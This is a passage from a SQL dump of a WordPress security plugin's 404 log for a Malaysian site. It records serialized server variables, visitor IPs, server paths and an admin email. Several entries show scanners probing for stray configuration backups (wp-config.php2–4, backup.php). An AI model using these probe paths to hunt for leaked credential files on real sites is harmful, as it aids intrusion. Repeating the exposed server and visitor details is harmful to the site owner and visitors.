:\"41355\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"https://bintara.com.my/wp-config.php4\";s:10:\"SCRIPT_URL\";s:15:\"/wp-config.php4\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZxltsfRZ9CaO@EBI5nb4wAAAIw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570530742.6146\";s:12:\"REQUEST_TIME\";s:10:\"1570530742\";}}','notice','2019-10-08 10:32:24','2019-10-08 10:32:23',35035952,36837776,'https://bintara.com.my/wp-config.php4',1,0,'185.220.101.30'),(27667,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/wp-config.php3\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=defb252fc9cb9b0c0bb95b0dd70fa3b8\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:52:\"MobileSafari/8536.25 CFNetwork/609.1.4 Darwin/13.0.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/wp-config.php3\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:15:\"/wp-config.php3\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZxlra43yJFbTvEjNLEtPgAAAQA\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/wp-config.php3\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/wp-config.php3\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZxlra43yJFbTvEjNLEtPgAAAQA\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"85.248.227.165\";s:11:\"REMOTE_PORT\";s:5:\"24610\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"https://bintara.com.my/wp-config.php3\";s:10:\"SCRIPT_URL\";s:15:\"/wp-config.php3\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZxlra43yJFbTvEjNLEtPgAAAQA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570530733.8705\";s:12:\"REQUEST_TIME\";s:10:\"1570530733\";}}','notice','2019-10-08 10:32:15','2019-10-08 10:32:14',35035952,36837776,'https://bintara.com.my/wp-config.php3',1,0,'85.248.227.165'),(27666,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/wp-config.php2\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:52:\"MobileSafari/8536.25 CFNetwork/609.1.4 Darwin/13.0.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/wp-config.php2\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:15:\"/wp-config.php2\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZxlpXURUVLSjYCXpcIm9wAAAME\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/wp-config.php2\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/wp-config.php2\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZxlpXURUVLSjYCXpcIm9wAAAME\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"85.248.227.165\";s:11:\"REMOTE_PORT\";s:5:\"27385\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"https://bintara.com.my/wp-config.php2\";s:10:\"SCRIPT_URL\";s:15:\"/wp-config.php2\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZxlpXURUVLSjYCXpcIm9wAAAME\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570530725.2287\";s:12:\"REQUEST_TIME\";s:10:\"1570530725\";}}','notice','2019-10-08 10:32:07','2019-10-08 10:32:05',35435088,37240832,'https://bintara.com.my/wp-config.php2',1,0,'85.248.227.165'),(27665,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:63:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"316\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:4:\"80-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"en-us\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:16:\"Microsoft Office\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:10:\"Production\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:3:\"iOS\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"59B72EC9-6E9D-4ABC-8872-C1F3A91B6E06\";s:21:\"HTTP_X_OFFICE_VERSION\";s:8:\"2.29.912\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:4:\"80-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZxeQ1Q75tQHORtJE8pduAAAAAE\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"183.171.105.247\";s:11:\"REMOTE_PORT\";s:5:\"52159\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZxeQ1Q75tQHORtJE8pduAAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570528835.5687\";s:12:\"REQUEST_TIME\";s:10:\"1570528835\";}}','notice','2019-10-08 10:00:37','2019-10-08 10:00:35',35412000,37216216,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'183.171.105.247'),(27663,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:132:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36 OPR/52.0.2871.64\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"103.134.111.90\";s:11:\"REMOTE_PORT\";s:5:\"54870\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZxE0wNc2mm-mpSb7y2WYAAAAcI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570522323.2333\";s:12:\"REQUEST_TIME\";s:10:\"1570522323\";}}','notice','2019-10-08 08:12:05','2019-10-08 08:12:03',35510056,37311744,'https://bintara.com.my/?page_id=18',1,0,'103.134.111.90'),(27664,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"318\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"A66E386B-E3ED-4557-9B6B-F6D906627157\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZxRVK43yJFbTvEjNLEmpgAAAQw\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.145.236\";s:11:\"REMOTE_PORT\";s:5:\"49369\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZxRVK43yJFbTvEjNLEmpgAAAQw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570525526.8394\";s:12:\"REQUEST_TIME\";s:10:\"1570525526\";}}','notice','2019-10-08 09:05:30','2019-10-08 09:05:27',35791928,37592776,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.145.236'),(27662,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:63:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:4:\"77-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"en-us\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:16:\"Microsoft Office\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"3\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:10:\"Production\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:3:\"Mac\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"FA612577-54B2-4A94-AA6E-F730018436AC\";s:21:\"HTTP_X_OFFICE_VERSION\";s:9:\"16.29.917\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:4:\"77-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZxA@lQ75tQHORtJE8pX8QAAAAE\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.145.236\";s:11:\"REMOTE_PORT\";s:5:\"51607\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZxA@lQ75tQHORtJE8pX8QAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570521338.8761\";s:12:\"REQUEST_TIME\";s:10:\"1570521338\";}}','notice','2019-10-08 07:55:41','2019-10-08 07:55:39',35800912,37605216,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.145.236'),(27661,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:68:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/backup.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:3:\"off\";s:7:\"H2_PUSH\";s:3:\"off\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:5:\"456-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:3:\"off\";s:16:\"REDIRECT_H2_PUSH\";s:3:\"off\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"456-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:24:\"REDIRECT_REDIRECT_H2PUSH\";s:3:\"off\";s:25:\"REDIRECT_REDIRECT_H2_PUSH\";s:3:\"off\";s:27:\"REDIRECT_REDIRECT_H2_PUSHED\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:31:\"REDIRECT_REDIRECT_H2_STREAM_TAG\";s:5:\"456-1\";s:23:\"REDIRECT_REDIRECT_HTTP2\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:33:\"https://bintara.com.my/backup.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:11:\"/backup.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZw0wQNc2mm-mpSb7y2NOQAAAAE\";s:19:\"REDIRECT_SCRIPT_URI\";s:33:\"https://bintara.com.my/backup.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:11:\"/backup.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZw0wQNc2mm-mpSb7y2NOQAAAAE\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"50.31.134.21\";s:11:\"REMOTE_PORT\";s:5:\"41674\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/backup.php\";s:10:\"SCRIPT_URL\";s:11:\"/backup.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZw0wQNc2mm-mpSb7y2NOQAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570518210.1752\";s:12:\"REQUEST_TIME\";s:10:\"1570518210\";}}','notice','2019-10-08 07:03:32','2019-10-08 